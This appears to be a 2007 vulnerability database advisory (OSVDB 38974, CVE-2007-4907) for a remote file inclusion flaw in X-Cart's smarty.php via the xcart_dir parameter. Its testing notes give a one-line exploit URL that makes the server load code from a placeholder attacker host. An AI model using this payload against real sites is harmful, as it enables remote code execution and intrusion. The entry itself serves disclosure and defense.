X-Cart smarty.php xcart_dir Variable Remote File Inclusion

2007-09-11T00:00:00
ID OSVDB:38974
Type osvdb
Reporter OSVDB
Modified 2007-09-11T00:00:00

Description

Manual Testing Notes

http://[target]/[xcart-path]/smarty.php?xcart_dir=http://[attacker]/[inject]?

References:

Related OSVDB ID: 38972 Related OSVDB ID: 38973 Related OSVDB ID: 38975 Related OSVDB ID: 38976 Related OSVDB ID: 38977 ISS X-Force ID: 36574 Generic Exploit URL: http://www.milw0rm.com/exploits/4396 CVE-2007-4907 Bugtraq ID: 25637